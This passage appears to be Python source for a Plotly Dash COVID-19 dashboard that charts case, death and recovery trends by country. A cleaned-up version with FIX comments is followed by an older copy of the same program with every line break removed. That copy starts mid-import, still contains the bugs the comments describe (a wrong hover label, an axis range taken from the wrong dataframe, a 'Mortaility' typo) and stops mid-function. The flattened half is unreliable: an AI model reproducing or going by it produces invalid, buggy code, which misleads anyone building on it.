            y=[1000 * math.exp(0.099021 * i) for i in days],
            name='Cases Double Every 7 Days', mode='lines', opacity=0.25,
            line=dict(color='grey', width=3, dash='dot'),
            text=['# of Cases Double Every 7 Days'],
            hovertemplate='<b>Cases Double Every 7 Days</b>', showlegend=True))
        layout_global = go.Layout(
            yaxis={'title': 'Number of Confirmed Cases',
                   'range': [np.log10(1000),
                             np.log10(cases_1000_start['Confirmed'].max() * 1.1)],
                   'type': 'log', 'fixedrange': True, 'linewidth': 2,
                   'linecolor': 'black', 'showgrid': False, 'dtick': 1,
                   'showline': True, 'mirror': False},
            title='Overall Confirmed Cases',
            xaxis={'title': 'Days Since First 1000 Cases',
                   'range': [0, cases_1000_start['Days Since 1000 Cases'].max()],
                   'fixedrange': True, 'linewidth': 2, 'linecolor': 'black',
                   'showgrid': False, 'showline': True, 'mirror': False},
            height=750, hovermode='closest', annotations=annotations)
        return {'data': traces, 'layout': layout_global}

    elif select_global == 'Global Deaths Trend':
        traces = []
        annotations = []
        for _, frame in deaths_100_start.groupby(by='Country_Region'):
            di = frame.sort_values(by=['Days Since 100 Deaths'])
            traces.append(go.Scatter(
                x=di['Days Since 100 Deaths'].tolist(),
                y=di['Deaths'].tolist(),
                mode='lines',
                line=dict(color=colors_dict_global[list(di.loc[:, 'Continent'])[0]],
                          width=1),
                opacity=0.6,
                text=di.Country_Region.tolist(),
                legendgroup=list(di.loc[:, 'Continent'])[0],
                # FIX: hover label previously said "Days Since First 1000
                # Cases" (copy-paste from the cases branch).
                hovertemplate='<b>%{text}</b><br>'
                              + '<br>Deaths: %{y}<br>'
                              + 'Days Since First 100 Deaths: %{x}<br>',
                showlegend=False))
            annotations.append({
                'x': int(di['Days Since 100 Deaths'].max() + 1.5),
                'y': np.log10(int(di['Deaths'].max())),
                'xref': 'x', 'yref': 'y', 'showarrow': False,
                'text': list(di.loc[:, 'Country_Region'])[0],
                'xanchor': 'right', 'yanchor': 'middle', 'align': 'center',
                'font': {'size': 8, 'color': 'black'},
                'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1,
                'bgcolor': '#ffffff', 'opacity': 0.6})
        days = list(np.arange(deaths_100_start['Days Since 100 Deaths'].max()))
        traces.append(go.Scatter(
            x=days,
            y=[100 * math.exp(0.2310491 * i) for i in days],
            name='Deaths Double Every 3 Days', mode='lines', opacity=0.25,
            line=dict(color='grey', width=3, dash='dash'),
            text=['# of Deaths Double Every 3 Days'],
            hovertemplate='<b>Deaths Double Every 3 Days</b>', showlegend=True))
        traces.append(go.Scatter(
            x=days,
            y=[100 * math.exp(0.099021 * i) for i in days],
            name='Deaths Double Every 7 Days', mode='lines', opacity=0.25,
            line=dict(color='grey', width=3, dash='dot'),
            text=['# of Deaths Double Every 7 Days'],
            hovertemplate='<b>Deaths Double Every 7 Days</b>', showlegend=True))
        layout_global = go.Layout(
            yaxis={'title': 'Number of Deaths',
                   # FIX: range was computed from cases_1000_start['Deaths']
                   # (copy-paste); use the deaths dataframe this branch plots.
                   'range': [np.log10(100),
                             np.log10(deaths_100_start['Deaths'].max() * 1.1)],
                   'type': 'log', 'fixedrange': True, 'linewidth': 2,
                   'linecolor': 'black', 'showgrid': False, 'dtick': 1,
                   'showline': True, 'mirror': False},
            title='Overall Deaths',
            xaxis={'title': 'Days Since First 100 deaths',
                   'range': [0, deaths_100_start['Days Since 100 Deaths'].max()],
                   'fixedrange': True, 'linewidth': 2, 'linecolor': 'black',
                   'showgrid': False, 'showline': True, 'mirror': False},
            height=750, hovermode='closest', annotations=annotations)
        return {'data': traces, 'layout': layout_global}

    elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)':
        # Horizontal bar chart: deaths/confirmed for the 20 largest outbreaks.
        traces = []
        m = mort.sort_values(by=['Confirmed'], ascending=False).head(20)
        m = m.sort_values(by=['Mortality_Percent'], ascending=True).reset_index()
        for i in range(len(m)):
            traces.append(go.Bar(
                name='Observed Case - Mortality Ratio',
                x=[m.loc[i, 'Mortality_Percent']],
                y=[m.loc[i, 'Country_Region']],
                text=[round(m.loc[i, 'Mortality_Percent'], 2)],
                orientation='h', textposition='auto',
                marker=dict(color='#FFB000', opacity=0.6,
                            line=dict(color='rgba(255,176,0, 1)', width=1)),
                # FIX: user-facing typo "Mortaility" -> "Mortality".
                hovertemplate='<b>%{y}</b><br>'
                              + '<br>Observed Case Mortality Pct: %{text}&#37;<br>',
                showlegend=False))
        layout_global = go.Layout(
            yaxis={'title': 'Country / Region', 'fixedrange': True,
                   'automargin': True, 'showline': True, 'mirror': False,
                   'linewidth': 2, 'linecolor': 'black'},
            title='Observed Case - Mortality Ratio',
            xaxis={'title': '% Mortality by Confirmed Cases (Top 20 Countries)',
                   'range': [0, m['Mortality_Percent'].max() + 2],
                   'fixedrange': True, 'showline': True, 'mirror': False,
                   'linewidth': 2, 'linecolor': 'black'},
            height=750, hovermode='closest')
        return {'data': traces, 'layout': layout_global}

    elif select_global == 'Recoveries vs. Deaths By Country':
        # Log-log scatter for countries with >= 100 deaths and recoveries.
        traces = []
        rc = mort.loc[(mort['Deaths'] >= 100)
                      & (mort['Recovered'] >= 100)].reset_index()
        for i in range(len(rc)):
            traces.append(go.Scatter(
                x=[rc.loc[i, 'Deaths']], y=[rc.loc[i, 'Recovered']],
                mode='markers+text', text=[rc.loc[i, 'Country_Region']],
                marker_color=colors_dict_global[rc.loc[i, 'Continent']],
                showlegend=False,
                marker=dict(size=12, line_width=1, opacity=0.75),
                hovertemplate='<b>%{text}</b><br>'
                              + '<br>Recoveries: %{y}<br>'
                              + 'Deaths: %{x}<br>',
                textposition='bottom center',
                textfont=dict(size=10, color='rgba(0, 0, 0, 0.6)')))
        guide_x = list(np.linspace(100, rc['Deaths'].max(), 3))
        traces.append(go.Scatter(
            x=guide_x, y=[i for i in guide_x], mode='lines',
            name='Deaths = Recoveries', opacity=0.25,
            line=dict(color='grey', width=1),
            text=['# of Deaths = # of Recoveries'],
            hovertemplate='<b># of Deaths = # of Recoveries</b>',
            showlegend=True))
        traces.append(go.Scatter(
            x=guide_x, y=[i * 2 for i in guide_x], mode='lines',
            name='2 Recoveries for Every Death', opacity=0.25,
            line=dict(color='green', width=3, dash='dash'),
            text=['2 Recoveries for Every Death'],
            hovertemplate='<b>2 Recoveries for Every Death</b>',
            showlegend=True))
        traces.append(go.Scatter(
            x=guide_x, y=[i / 2 for i in guide_x], mode='lines',
            name='2 Deaths for Every Recovery', opacity=0.25,
            line=dict(color='firebrick', width=3, dash='dash'),
            text=['2 Deaths for Every Recovery'],
            hovertemplate='<b>2 Deaths for Every Recovery</b>',
            showlegend=True))
        layout_global = go.Layout(
            yaxis={'title': 'Number of Recoveries', 'fixedrange': True,
                   'automargin': True,
                   'range': [np.log10(100),
                             np.log10(rc['Recovered'].max() * 1.1)],
                   'type': 'log', 'linewidth': 2, 'linecolor': 'black',
                   'showgrid': False, 'dtick': 1, 'showline': True,
                   'mirror': False},
            title='Recoveries vs. Deaths, By Country',
            xaxis={'title': 'Number of Deaths', 'fixedrange': True,
                   'range': [np.log10(100),
                             np.log10(rc['Deaths'].max() * 1.1)],
                   'type': 'log', 'linewidth': 2, 'linecolor': 'black',
                   'showgrid': False, 'dtick': 1, 'showline': True,
                   'mirror': False},
            height=750, hovermode='closest')
        return {'data': traces, 'layout': layout_global}
def _daily_panel(country, column, color, bar_name, title_prefix, yaxis_title):
    """Build one 45-day daily-bar + 5-day-moving-average subplot figure."""
    rows = final_df.loc[final_df['Country_Region'] == country]
    dates = rows['Date'].tail(45)
    values = rows[column].tail(45)
    data = [
        go.Bar(name=bar_name, x=dates, y=values,
               marker_color=color, opacity=0.6),
        go.Scatter(name='5 Day Moving Average', x=dates,
                   y=values.rolling(window=5).mean(), mode='lines',
                   line=dict(color=color, width=3)),
    ]
    layout = go.Layout(
        yaxis={'title': yaxis_title, 'automargin': True, 'showline': True,
               'mirror': False, 'linewidth': 2, 'linecolor': 'black'},
        title='{0}: {1} (Last 45 Days)'.format(title_prefix, country),
        xaxis={'type': 'date', 'automargin': True, 'showline': True,
               'mirror': False, 'linewidth': 2, 'linecolor': 'black'},
        height=300, legend=dict(x=0.2, y=-0.15, orientation='h'))
    return {'data': data, 'layout': layout}


def _latest(country, column):
    """Most recent day's value of *column* for *country* (pandas Series)."""
    return final_df.loc[(final_df['Date'] == final_df['Date'].max())
                        & (final_df['Country_Region'] == country), column]


@app.callback([Output(component_id='main-dropdown-2', component_property='options'),
               Output(component_id='btext1', component_property='children'),
               Output(component_id='subplot1', component_property='figure'),
               Output(component_id='btext2', component_property='children'),
               Output(component_id='subplot2', component_property='figure'),
               Output(component_id='btext3', component_property='children'),
               Output(component_id='subplot3', component_property='figure')],
              [Input(component_id='main-dropdown', component_property='value')])
def update_country(selected_country):
    """Populate the Country View summary row for the selected country.

    Returns the graph-type dropdown options, plus (headline value, figure)
    pairs for daily cases, deaths and recoveries.

    FIX: the original duplicated its entire body in both arms of an
    ``if selected_country is None`` check; the arms were byte-identical
    apart from the 'Canada' default, so they are collapsed here and the
    three near-identical panel builders are factored into ``_daily_panel``.
    """
    if selected_country is None:
        # Initial load before any selection: default to Canada.
        selected_country = 'Canada'
    options = ['Confirmed', 'Recovered', 'Deaths',
               'Total and Daily Confirmed Cases']
    vals = [{'label': i, 'value': i} for i in options]
    fig_cases = _daily_panel(selected_country, 'Confirmed_Diff', '#648FFF',
                             'Daily Cases', 'Daily Confirmed Cases',
                             'Number of Confirmed Cases')
    fig_deaths = _daily_panel(selected_country, 'Deaths_Diff', '#DC267F',
                              'Daily Deaths', 'Daily Deaths',
                              'Number of Deaths')
    fig_recovered = _daily_panel(selected_country, 'Recovered_Diff', '#009E73',
                                 'Daily Recoveries', 'Daily Recovered',
                                 'Number of Recovered')
    return (vals,
            _latest(selected_country, 'Confirmed_Diff'), fig_cases,
            _latest(selected_country, 'Deaths_Diff'), fig_deaths,
            _latest(selected_country, 'Recovered_Diff'), fig_recovered)
@app.callback(Output(component_id='box-1', component_property='figure'),
              [Input(component_id='main-dropdown', component_property='value'),
               Input(component_id='main-dropdown-2', component_property='value')])
def update_maingraph(selected_country, selected_graph):
    """Build the main cumulative Country View graph.

    FIX: the original's first two branches (graph unset, country unset vs.
    graph unset, country set) were byte-identical apart from assigning the
    'Canada' default; they are collapsed here. The default is only applied
    when BOTH inputs are None, preserving the original behavior for the
    "graph picked but no country" case (which plots an empty frame).
    """
    if selected_country is None and selected_graph is None:
        selected_country = 'Canada'
    rows = final_df.loc[final_df['Country_Region'] == selected_country]
    if selected_graph is None:
        # Default view: cumulative confirmed cases as a bar series.
        figmain_t = [go.Bar(name='Total Confirmed Cases',
                            x=rows['Date'], y=rows['Confirmed'],
                            marker_color='#648FFF')]
        figmain_l = go.Layout(
            yaxis={'title': 'Number of Cases',
                   'range': [0, rows['Confirmed'].max() * 1.1],
                   'automargin': True, 'showline': True, 'mirror': False,
                   'linewidth': 2, 'linecolor': 'black'},
            title='Overall Progression of COVID-19: {0}'.format(
                str(selected_country)),
            hovermode='x unified',
            xaxis=dict(title='Date', fixedrange=True, automargin=True,
                       showline=True, mirror=False, linewidth=2,
                       linecolor='black'))
        return {'data': figmain_t, 'layout': figmain_l}
    if selected_graph == 'Total and Daily Confirmed Cases':
        # Overlay: cumulative line plus filled daily-increase line.
        figmain_t = [go.Scatter(name='Total Confirmed Cases',
                                x=rows['Date'], y=rows['Confirmed'],
                                line=dict(color='#1A85FF', width=1.5),
                                mode='lines'),
                     go.Scatter(name='Daily Confirmed Cases',
                                x=rows['Date'], y=rows['Confirmed_Diff'],
                                line=dict(color='#D41159', width=3),
                                mode='lines', fill='tozeroy')]
        figmain_l = go.Layout(
            yaxis={'title': 'Number of Cases',
                   'range': [0, rows['Confirmed'].max() * 1.1],
                   'automargin': True, 'showline': True, 'mirror': False,
                   'linewidth': 2, 'linecolor': 'black'},
            title='Overall Progression of COVID-19 ({0}): {1}'.format(
                str(selected_country), str(selected_graph)),
            hovermode='x unified',
            xaxis=dict(title='Date', fixedrange=True, automargin=True,
                       showline=True, mirror=False, linewidth=2,
                       linecolor='black'))
        return {'data': figmain_t, 'layout': figmain_l}
    # Single cumulative metric (Confirmed / Deaths / Recovered) as bars.
    cols_dict = {'Confirmed': '#648FFF', 'Deaths': '#DC267F',
                 'Recovered': '#009E73'}
    figmain_t = [go.Bar(name='Total {0}'.format(selected_graph),
                        x=rows['Date'], y=rows[selected_graph],
                        marker_color=cols_dict[selected_graph])]
    figmain_l = go.Layout(
        yaxis={'title': 'Number of Cases',
               'range': [0, rows[selected_graph].max() * 1.1],
               'automargin': True, 'showline': True, 'mirror': False,
               'linewidth': 2, 'linecolor': 'black'},
        title='Overall Progression of COVID-19 ({0}): {1}'.format(
            str(selected_country), str(selected_graph)),
        hovermode='x unified',
        xaxis=dict(title='Date', fixedrange=True, automargin=True,
                   showline=True, mirror=False, linewidth=2,
                   linecolor='black'))
    return {'data': figmain_t, 'layout': figmain_l}


if __name__ == '__main__':
    app.run_server()
dash.dependencies import Input, Output import plotly.graph_objects as go import math urls = [ 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv' , 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv' , 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_recovered_global.csv' ] final_df = pd.read_csv('C:/Users/Jordan/Documents/COVID19/final_df.csv') final_df = calc_diff_country(final_df) final_df['Date'] = pd.to_datetime(final_df['Date']) final_df['Country_Region'] = final_df['Country_Region'].astype(str) cases_1000_start = final_df.loc[(final_df['Confirmed'] >= 1000) & (final_df ['Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()[ 'Date'] cases_1000_start = cases_1000_start.reset_index() cases_1000_start = cases_1000_start.rename(columns={'Date': 'Start_Date'}) final_df['Country_Region'] = final_df['Country_Region'].str.strip() cases_1000_start = pd.merge(cases_1000_start, final_df, on=[ 'Country_Region'], how='right') cases_1000_start['Start_Date'] = pd.to_datetime(cases_1000_start['Start_Date']) cases_1000_start['Date'] = pd.to_datetime(cases_1000_start['Date']) cases_1000_start = cases_1000_start[cases_1000_start['Start_Date'].notna()] cases_1000_start['Days Since 1000 Cases'] = (cases_1000_start['Date'] - cases_1000_start['Start_Date']).dt.days deaths_100_start = final_df.loc[(final_df['Deaths'] >= 100) & (final_df[ 'Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()[ 'Date'] deaths_100_start = deaths_100_start.reset_index() deaths_100_start = deaths_100_start.rename(columns={'Date': 'Start_Date'}) final_df['Country_Region'] = final_df['Country_Region'].str.strip() deaths_100_start = pd.merge(deaths_100_start, final_df, on=[ 'Country_Region'], 
how='right') deaths_100_start['Start_Date'] = pd.to_datetime(deaths_100_start['Start_Date']) deaths_100_start['Date'] = pd.to_datetime(deaths_100_start['Date']) deaths_100_start = deaths_100_start[deaths_100_start['Start_Date'].notna()] deaths_100_start['Days Since 100 Deaths'] = (deaths_100_start['Date'] - deaths_100_start['Start_Date']).dt.days mort = final_df.groupby(['Country_Region'])['Date'].max().reset_index() mort = pd.merge(mort, final_df, on=['Country_Region', 'Date'], how='left') mort['Mortality_Percent'] = mort['Deaths'] / mort['Confirmed'] * 100.0 colors_dict_global = {'Europe': '#1D6996', 'Asia': '#CC503E', 'Africa': '#94346E', 'North America': '#38A6A5', 'Middle East': '#EDAD08', 'South America': '#E17C05', 'Caribbean & Central America': '#0F8554', 'Oceania': '#73AF48'} external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css'] app = dash.Dash(__name__, external_stylesheets=external_stylesheets) server = app.server app.layout = html.Div(children=[html.H2(children='COVID-19 Dashboard'), html.H4(children= 'A Basic Dashboard to Help Track the COVID-19 Pandemic'), html.Br(), html.H5(children='Global View'), html.P(children= 'The Global View highlights how Covid-19 is affecting countries across the world, and how the pandemic is expanding on a country by country basis. The Global View includes the following:' ), html.Div([html.Ul([html.Li([html.B( 'Cumulative Cases by Country Since First 1000 Cases: '), 'This allows us to see how cases are spreading since the first 1000 Cases on a country by country basis' ]), html.Li([html.B( 'Cumulative Cases by Country Since First 100 Deaths: '), 'This allows us to see COVID-19 fatalities since the first 100 Deaths on a country by country basis' ]), html.Li([html.B( 'Observed Case - Mortality Ratio (Top 20 Countries by Confirmed Cases): ' ), 'This allows us to see the percentage of COVID19 fatalities based on reported cases and deaths. 
(Note that reporting standards vary from country to country, so this is for illustrative purposes only)' ]), html.Li([html.B( 'Recoveries vs. Deaths By Country (Countries with over 100 deaths and 100 recoveries: ' ), 'This plots Recoveries against Deaths on a country by country basis. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)' ])])], style={'font-size': 12}), html.Br(), dcc.Dropdown(id= 'global-dropdown', options=[{'label': y, 'value': y} for y in [ 'Global Cases Trend', 'Global Deaths Trend', '% Mortality by Confirmed Cases (Top 20 Countries)', 'Recoveries vs. Deaths By Country']], placeholder= 'Pick Graphs From Here...'), dcc.Graph(id='global-box-1'), html.Br(), html.H5(children='Country View'), html.P( 'The Country view allows us to see a closer look on how the COVID-19 Pandemic has expanded. As opposed to a high level aggregation, the Country View provides a day by day time series analysis of the effects of COVID-19. The Country View includes the following:' ), html.Div(style={'font-size': 12}, children=[html.Ul([html.Li([html.B ('Confirmed: '), 'Cumulative Confirmed Cases of COVID-19 since January 22nd, 2020']), html.Li([html.B('Recovered: '), 'Cumulative Recovered Cases of COVID-19 since January 22nd, 2020']), html.Li([html.B('Deaths: '), 'Cumulative Deaths from COVID-19 since January 22nd, 2020']), html.Li([ html.B('Total and Daily Confirmed Cases: '), 'Cumulative and Daily Cases Since January 22nd, 2020. This illustrates the curve of daily cases in relation to the total cases for a country' ])])]), dcc.Dropdown(id='main-dropdown', options=[{'label': x, 'value': x} for x in list(final_df.Country_Region.unique())], placeholder= 'Pick a Country From Here...'), dcc.Dropdown(id='main-dropdown-2', placeholder='Pick Graphs From Here...'), dcc.Graph(id='box-1'), html. 
Div([html.Div([html.H6(children='Most Recent New Cases'), html.H1(id= 'btext1'), dcc.Graph(id='subplot1')], className='four columns', style={ 'color': '#648FFF'}), html.Div([html.H6(children= 'Most Recent Daily Deaths'), html.H1(id='btext2'), dcc.Graph(id= 'subplot2')], className='four columns', style={'color': '#DC267F'}), html.Div([html.H6(children='Most Recent Daily Recovered'), html.H1(id= 'btext3'), dcc.Graph(id='subplot3')], className='four columns', style={ 'color': '#009E73', 'layout': 'right'})], className='row')]) @app.callback(Output(component_id='global-box-1', component_property= 'figure'), [Input(component_id='global-dropdown', component_property= 'value')]) def global_update(select_global): if select_global == 'Global Cases Trend' or select_global is None: fig1000 = [] anno = [] for group, dataframe in cases_1000_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 1000 Cases']) trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(), y=di ['Confirmed'].tolist(), mode='lines', line=dict(color= colors_dict_global[list(di.loc[:, 'Continent'])[0]], width= 1), opacity=0.6, text=di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate= '<b>%{text}</b><br>' + '<br>Confirmed Cases: %{y}<br>' + 'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a = {'x': int(di['Days Since 1000 Cases'].max() + 1.5), 'y': np .log10(int(di['Confirmed'].max())), 'xref': 'x', 'yref': 'y', 'showarrow': False, 'text': list(di.loc[:, 'Country_Region'])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align': 'center', 'font': {'size': 8, 'color': 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6} fig1000.append(trace) anno.append(a) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.2310491 * i)) for i in list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max()))], name= 'Cases Double Every 3 
Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dash'), text=[ '# of Cases Double Every 3 Days'], hovertemplate= '<b>Cases Double Every 3 Days</b>', showlegend=True)) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.099021 * i)) for i in list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max()))], name= 'Cases Double Every 7 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dot'), text=[ '# of Cases Double Every 7 Days'], hovertemplate= '<b>Cases Double Every 7 Days</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'range': [np.log10(1000), np.log10 (cases_1000_start['Confirmed'].max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title='Overall Confirmed Cases', xaxis={'title': 'Days Since First 1000 Cases', 'range': [0, cases_1000_start[ 'Days Since 1000 Cases'].max()], 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'showline': True, 'mirror': False}, height=750, hovermode= 'closest', annotations=anno) fig_global = {'data': fig1000, 'layout': layout_global} return fig_global elif select_global == 'Global Deaths Trend': fig100 = [] anno = [] for group, dataframe in deaths_100_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 100 Deaths']) trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(), y=di ['Deaths'].tolist(), mode='lines', line=dict(color= colors_dict_global[list(di.loc[:, 'Continent'])[0]], width= 1), opacity=0.6, text=di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate= '<b>%{text}</b><br>' + '<br>Deaths: %{y}<br>' + 'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a = {'x': int(di['Days Since 100 Deaths'].max() + 1.5), 'y': np .log10(int(di['Deaths'].max())), 'xref': 'x', 
'yref': 'y', 'showarrow': False, 'text': list(di.loc[:, 'Country_Region' ])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align': 'center', 'font': {'size': 8, 'color': 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6} fig100.append(trace) anno.append(a) fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.2310491 * i)) for i in list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max()))], name= 'Deaths Double Every 3 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dash'), text=[ '# of Deaths Double Every 3 Days'], hovertemplate= '<b>Deaths Double Every 3 Days</b>', showlegend=True)) fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.099021 * i)) for i in list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max()))], name= 'Deaths Double Every 7 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dot'), text=[ '# of Deaths Double Every 7 Days'], hovertemplate= '<b>Deaths Double Every 7 Days</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Deaths', 'range': [np.log10(100), np.log10(cases_1000_start['Deaths']. 
max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title='Overall Deaths', xaxis={'title': 'Days Since First 100 deaths', 'range': [0, deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'showline': True, 'mirror': False}, height=750, hovermode= 'closest', annotations=anno) fig_global = {'data': fig100, 'layout': layout_global} return fig_global elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)': figmort = [] anno = [] m = mort.sort_values(by=['Confirmed'], ascending=False).head(20) m = m.sort_values(by=['Mortality_Percent'], ascending=True ).reset_index() for i in range(len(m)): m1 = m.loc[i, 'Country_Region'] m2 = m.loc[i, 'Mortality_Percent'] trace = go.Bar(name='Observed Case - Mortality Ratio', x=[m2], y=[m1], text=[round(m.loc[i, 'Mortality_Percent'], 2)], orientation='h', textposition='auto', marker=dict(color= '#FFB000', opacity=0.6, line=dict(color= 'rgba(255,176,0, 1)', width=1)), hovertemplate= '<b>%{y}</b><br>' + '<br>Observed Case Mortaility Pct: %{text}&#37;<br>', showlegend=False) figmort.append(trace) layout_global = go.Layout(yaxis={'title': 'Country / Region', 'fixedrange': True, 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Observed Case - Mortality Ratio', xaxis={'title': '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [ 0, m['Mortality_Percent'].max() + 2], 'fixedrange': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=750, hovermode='closest') fig_global = {'data': figmort, 'layout': layout_global} return fig_global elif select_global == 'Recoveries vs. 
Deaths By Country': figscat = [] rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >= 100) ].reset_index() for i in range(len(rc)): scat = go.Scatter(x=[rc.loc[i, 'Deaths']], y=[rc.loc[i, 'Recovered']], mode='markers+text', text=[rc.loc[i, 'Country_Region']], marker_color=colors_dict_global[rc.loc[ i, 'Continent']], showlegend=False, marker=dict(size=12, line_width=1, opacity=0.75), hovertemplate= '<b>%{text}</b><br>' + '<br>Recoveries: %{y}<br>' + 'Deaths: %{x}<br>', textposition='bottom center', textfont= dict(size=10, color='rgba(0, 0, 0, 0.6)')) figscat.append(scat) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[i for i in list(np.linspace(100, rc['Deaths'].max(), 3))], mode='lines', name='Deaths = Recoveries', opacity=0.25, line=dict(color='grey', width=1), text=[ '# of Deaths = # of Recoveries'], hovertemplate= '<b># of Deaths = # of Recoveries</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[(i * 2) for i in list(np.linspace(100, rc['Deaths']. max(), 3))], mode='lines', name='2 Recoveries for Every Death', opacity=0.25, line=dict(color='green', width=3, dash='dash'), text=['2 Recoveries for Every Death'], hovertemplate= '<b>2 Recoveries for Every Death</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[(i / 2) for i in list(np.linspace(100, rc['Deaths']. max(), 3))], mode='lines', name='2 Deaths for Every Recovery', opacity=0.25, line=dict(color='firebrick', width=3, dash='dash' ), text=['2 Deaths for Every Recovery'], hovertemplate= '<b>2 Deaths for Every Recovery</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Recoveries', 'fixedrange': True, 'automargin': True, 'range': [np.log10(100), np.log10(rc['Recovered'].max() * 1.1)], 'type': 'log', 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title= 'Recoveries vs. 
Deaths, By Country', xaxis={'title': 'Number of Deaths', 'fixedrange': True, 'range': [np.log10(100), np.log10(rc['Deaths'].max() * 1.1)], 'type': 'log', 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, height=750, hovermode='closest' ) fig_global = {'data': figscat, 'layout': layout_global} return fig_global @app.callback([Output(component_id='main-dropdown-2', component_property= 'options'), Output(component_id='btext1', component_property='children' ), Output(component_id='subplot1', component_property='figure'), Output (component_id='btext2', component_property='children'), Output( component_id='subplot2', component_property='figure'), Output( component_id='btext3', component_property='children'), Output( component_id='subplot3', component_property='figure')], [Input( component_id='main-dropdown', component_property='value')]) def update_country(selected_country): if selected_country is None: selected_country = 'Canada' options = ['Confirmed', 'Recovered', 'Deaths', 'Total and Daily Confirmed Cases'] vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5). 
mean(), mode='lines', line=dict(color='#648FFF', width=3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Confirmed Cases: {0} (Last 45 Days)'.format( selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df ['Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width=3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country), 